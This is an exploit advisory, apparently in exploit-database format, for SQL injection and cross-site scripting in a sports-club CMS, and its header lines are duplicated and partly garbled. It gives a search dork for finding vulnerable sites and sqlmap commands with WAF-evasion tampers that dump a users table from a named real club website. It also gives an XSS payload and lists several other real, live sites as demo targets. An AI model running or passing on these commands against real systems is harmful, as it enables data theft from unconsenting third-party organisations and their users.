# Google Dork:intext:"K & N Concepts Ltd"
# Date: 2020-03-31
# Exploit Author: @Thela # Exploit Title: KandNconcepts Club CMS 1.x SQL Injection & XSS Vulnerability
# Google Dork:intext:"K & N Concepts Ltd"
# Date: 2020-03-31
# Exploit Author: @ThelastVvV
# Vendor Homepage:https://it-it.facebook.com/kandnconcepts / kandnconcepts.co.uk
# Version: 1.1&1.2
# Tested on: Ubuntu
---------------------------------------------------------
PoC 1:
The attacker once locate the sql vulnerability can perform an automated process to exploit the secruity in the webapp
Payload(s)
http://www.site.com/content.php?Id=[]'[SQL INJECTION VULNERABILITY!]
SQLMAP Payload(s):
sqlmap -u http://www.thursounited.co.uk/team.php?id=1 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
sqlmap -u http://www.thursounited.co.uk/team.php?id=1 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" -D thursounited_co --tables
sqlmap -u http://www.thursounited.co.uk/team.php?id=1 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dump -D thursounited_co -T tufc_users
PoC 2 :
XSS Vulnerability
Payload(s) :
"><img src=x onerror=prompt(document.domain);>
use payload:
http://www.thursounited.co.uk/team.php?id=1%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain);%3E
www.anysite.com/file.php?id="><img src=x onerror=prompt(document.domain);>
Demos:
http://www.thursounited.co.uk/team.php?id=1'
https://www.nairncountyarchive.co.uk/player.php?id=11'
https://clydebankfc.co.uk/player.php?id=364'
http://www.wick-academy.co.uk/playerstats/player.php?id=304'
http://northcaleyfa.com/club.php?id=42'